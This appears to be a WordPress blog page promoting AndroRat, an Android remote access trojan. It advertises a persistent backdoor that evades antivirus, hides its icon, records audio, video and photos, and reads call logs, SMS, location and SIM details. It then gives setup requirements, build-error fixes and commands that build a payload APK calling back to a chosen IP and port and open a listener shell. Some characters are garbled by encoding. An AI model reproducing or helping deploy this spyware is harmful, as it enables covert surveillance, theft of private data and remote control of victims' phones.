AndroRat.

Features of AndroRat

  • Full persistent backdoor
  • Fully undetectable by any antivirus scanner VirusTota
  • Invisible icon on install
  • Light weight apk which runs 24*7 in background
  • Can record audio, video, take picture from both camera
  • Browse call logs and SMS logs
  • Get current location, sim card details ,ip, mac address of the device

Requirements.

  • AndroRAT requires Python3 and JAVA (or Android Studio)

Installation.

Note :

While cloning the repository using Git bash on Windows, you may get the following error:

error: unable to create file <filename>: Filename too long

This is because the Git has a limit of 4096 characters for a filename, except on Windows when Git is compiled with msys. It uses an older version of the Windows API and there’s a limit of 260 characters for a filename.

You can circumvent this by setting core.longpaths to true.

β€’ git config –system core.longpaths true

You must run Git bash with administrator privileges.

Build :

Error :

Fixing :

  • Windows : Download build tools 30, unzip and add the directory to your environment path. Then run the AndroRAT.
  • Linux : Just normal β€’ apt-get install zipalign . should work.
  • Termux : RunΒ β€’ pkg install aapt.

shell mode :

Example :

  • To build the apk using desired ip and port: python3 androRAT.py –build -i 192.169.x.x -p 8000 -o test.apk
  • To get the interpreter: python3 androRAT.py –shell -i 0.0.0.0 -p 8000

———————————————————————-

For contactπŸ“ž

Leave a comment

Design a site like this with WordPress.com
Get started